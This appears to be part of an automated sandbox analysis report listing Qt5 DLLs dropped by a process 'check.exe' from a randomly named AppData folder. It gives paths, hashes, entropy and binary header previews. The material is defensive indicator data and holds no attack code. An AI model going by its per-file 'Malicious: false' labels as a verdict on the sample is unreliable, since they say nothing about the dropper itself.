SHA-512:	756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libEGL.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25072
Entropy (8bit):	5.961464514165753
Encrypted:	false
SSDEEP:	384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
MD5:	BB00EF1DD81296AF10FDFA673B4D1397
SHA1:	773FFCF4A231B963BAAC36CBEF68079C09B62837
SHA-256:	32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
SHA-512:	C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\libGLESv2.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3385328
Entropy (8bit):	6.382356347494905
Encrypted:	false
SSDEEP:	49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
MD5:	2247EE4356666335DF7D72129AF8D600
SHA1:	F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
SHA-256:	50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
SHA-512:	67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\opengl32sw.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20923392
Entropy (8bit):	6.255903817217008
Encrypted:	false
SSDEEP:	393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
MD5:	7DBC97BFEE0C7AC89DA8D0C770C977B6
SHA1:	A064C8D8967AAA4ADA29BD9FEFBE40405360412C
SHA-256:	963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
SHA-512:	286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68080
Entropy (8bit):	6.207162014262433
Encrypted:	false
SSDEEP:	1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
MD5:	750A31DE7840B5EED8BA14C1BD84D348
SHA1:	D345D13B0C303B7094D1C438E49F0046791DE7F6
SHA-256:	A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
SHA-512:	5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	41968
Entropy (8bit):	6.0993566622860635
Encrypted:	false
SSDEEP:	768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
MD5:	313F89994F3FEA8F67A48EE13359F4BA
SHA1:	8C7D4509A0CAA1164CC9415F44735B885A2F3270
SHA-256:	42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
SHA-512:	06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:..i..i..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qgif.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39408
Entropy (8bit):	6.0316011626259405
Encrypted:	false
SSDEEP:	768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
MD5:	52FD90E34FE8DED8E197B532BD622EF7
SHA1:	834E280E00BAE48A9E509A7DC909BEA3169BDCE2
SHA-256:	36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
SHA-512:	EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qicns.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45040
Entropy (8bit):	6.016125225197622
Encrypted:	false
SSDEEP:	768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
MD5:	AD84AF4D585643FF94BFA6DE672B3284
SHA1:	5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
SHA-256:	F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
SHA-512:	B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qico.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38384
Entropy (8bit):	5.957072398645384
Encrypted:	false
SSDEEP:	768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
MD5:	A9ABD4329CA364D4F430EDDCB471BE59
SHA1:	C00A629419509929507A05AEBB706562C837E337
SHA-256:	1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
SHA-512:	004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	421360
Entropy (8bit):	5.7491063936821405
Encrypted:	false
SSDEEP:	6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
MD5:	16ABCCEB70BA20E73858E8F1912C05CD
SHA1:	4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
SHA-256:	FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
SHA-512:	3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..\|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qsvg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32240
Entropy (8bit):	5.978149408776758
Encrypted:	false
SSDEEP:	768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
MD5:	C0DE135782FA0235A0EA8E97898EAF2A
SHA1:	FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
SHA-256:	B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
SHA-512:	7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtga.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	5.865766652452823
Encrypted:	false
SSDEEP:	768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
MD5:	A913276FA25D2E6FD999940454C23093
SHA1:	785B7BC7110218EC0E659C0E5ACE9520AA451615
SHA-256:	5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
SHA-512:	CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qtiff.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	390128
Entropy (8bit):	5.724665470266677
Encrypted:	false
SSDEEP:	6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
MD5:	9C0ACF12D3D25384868DCD81C787F382
SHA1:	C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
SHA-256:	825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
SHA-512:	45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30192
Entropy (8bit):	5.938644231596902
Encrypted:	false
SSDEEP:	768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
MD5:	68919381E3C64E956D05863339F5C68C
SHA1:	CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
SHA-256:	0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
SHA-512:	6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats\qwebp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	510448
Entropy (8bit):	6.605517748735854
Encrypted:	false
SSDEEP:	12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
MD5:	308E4565C3C5646F9ABD77885B07358E
SHA1:	71CB8047A9EF0CDB3EE27428726CACD063BB95B7
SHA-256:	6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
SHA-512:	FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qminimal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	844784
Entropy (8bit):	6.625808732261156
Encrypted:	false
SSDEEP:	12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
MD5:	2F6D88F8EC3047DEAF174002228219AB
SHA1:	EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
SHA-256:	05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
SHA-512:	0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754672
Entropy (8bit):	6.6323155845799695
Encrypted:	false
SSDEEP:	12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
MD5:	6407499918557594916C6AB1FFEF1E99
SHA1:	5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
SHA-256:	54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
SHA-512:	8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.\|.JQ..KT..K...K.\|.Js..K.\|.JS..K.\|.JU..K.\|[KU..K.\|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwebgl.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	482288
Entropy (8bit):	6.152380961313931
Encrypted:	false
SSDEEP:	6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
MD5:	1EDCB08C16D30516483A4CBB7D81E062
SHA1:	4760915F1B90194760100304B8469A3B2E97E2BC
SHA-256:	9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
SHA-512:	0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qwindows.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1477104
Entropy (8bit):	6.575113537540671
Encrypted:	false
SSDEEP:	24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
MD5:	4931FCD0E86C4D4F83128DC74E01EAAD
SHA1:	AC1D0242D36896D4DDA53B95812F11692E87D8DF
SHA-256:	3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
SHA-512:	0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68592
Entropy (8bit):	6.125954940500008
Encrypted:	false
SSDEEP:	1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
MD5:	F66F6E9EDA956F72E3BB113407035E61
SHA1:	97328524DA8E82F5F92878F1C0421B38ECEC1E6C
SHA-256:	E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
SHA-512:	7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144368
Entropy (8bit):	6.294675868932723
Encrypted:	false
